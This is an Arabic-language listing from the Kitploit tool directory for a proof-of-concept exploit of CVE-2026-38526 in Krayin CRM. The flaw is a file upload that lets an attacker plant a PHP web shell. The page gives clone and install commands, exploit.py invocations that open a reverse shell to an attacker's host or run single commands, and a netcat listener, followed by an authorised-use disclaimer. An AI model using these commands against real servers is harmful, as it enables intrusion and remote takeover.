Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38526-POC — إثبات مفهوم لـ CVE-2026-38526 في Krayin CRM <= v2.2.x. رفع ملف عشوائي يؤدي إلى تنفيذ تعليمات برمجية عن بعد. | Kitploit
أدوات/GitHubGitHub/pawpic/cve-2026-38526-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

إثبات مفهوم لـ CVE-2026-38526 في Krayin CRM <= v2.2.x. رفع ملف عشوائي يؤدي إلى تنفيذ تعليمات برمجية عن بعد.

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38526 - أداة استغلال RCE في Krayin CRM

Krayin CRM (≤ 2.2.x) - رفع ملف غير مقيد يؤدي إلى تنفيذ كود عن بُعد.

يستغل هذا الإثبات المفاهيمي (PoC) نقطة نهاية رفع TinyMCE الضعيفة (/admin/tinymce/upload) لرفع قشرة ويب PHP وتحقيق تنفيذ الأوامر على الخادم.


الميزات

  • تسجيل دخول تلقائي كامل مع معالجة رمز CSRF
  • تجاوز قيود الرفع باستخدام الامتداد المزدوج
  • يدعم القشرة العكسية وتنفيذ أمر واحد
  • تحديث موثوق لرمز CSRF الخاص بـ Laravel
  • نظيف وسهل الاستخدام

التحميل

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

المتطلبات

root@kitploit:~
pip3 install requests beautifulsoup4

الاستخدام

  1. القشرة العكسية (الافتراضية والموصى بها)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. أمر واحد
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

الخيارات

الوسيطالوصفإلزامي
-u, --urlعنوان URL الأساسي للهدفنعم
-e, --emailالبريد الإلكتروني لتسجيل الدخولنعم
-p, --passwordكلمة المرور لتسجيل الدخولنعم
-c, --cmdتنفيذ أمر واحدلا
--lhostعنوان IP الخاص بك للقشرة العكسيةنعم (إذا لم تستخدم --cmd)
--lportمنفذ الاستماعلا (الافتراضي: 4444)

سير العمل المثال

ابدأ المستمع:

root@kitploit:~
nc -lvnp 4444

شغّل أداة الاستغلال:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

إخلاء مسؤولية

أداة الاستغلال هذه مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد أنظمة ليس لديك إذن صريح لاختبارها غير قانوني.

الإصدارات المتأثرة

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

المؤلف: pawpic التاريخ: 2026

تنزيل الأداة